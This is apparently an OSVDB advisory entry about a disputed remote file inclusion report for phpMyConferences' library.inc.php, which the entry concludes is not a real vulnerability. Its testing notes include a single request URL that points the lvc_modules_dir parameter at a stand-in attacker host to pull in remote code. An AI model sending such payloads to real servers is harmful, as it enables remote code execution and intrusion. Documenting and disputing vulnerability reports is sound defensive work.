phpMyConferences library.inc.php lvc_modules_dir Variable Remote File Inclusion

2006-10-31T03:26:01
ID OSVDB:31168
Type osvdb
Reporter OSVDB
Modified 2006-10-31T03:26:01

Description

Vulnerability Description

phpMyConferences has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the library.inc.php script not properly sanitizing user input supplied to the 'lvc_modules_dir' variable. However, this variable is set prior to an attacker supplying input and it can not be manipulated as suggested.

Solution Description

The vulnerability reported is incorrect. No solution required.

Short Description

phpMyConferences has been reported to contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is supposedly due to the library.inc.php script not properly sanitizing user input supplied to the 'lvc_modules_dir' variable. However, this variable is set prior to an attacker supplying input and it can not be manipulated as suggested.

Manual Testing Notes

http://[target]/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://[attacker]/

References:

Mail List Post: http://attrition.org/pipermail/vim/2006-November/001105.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0504.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0041.html ISS X-Force ID: 29919 CVE-2006-5678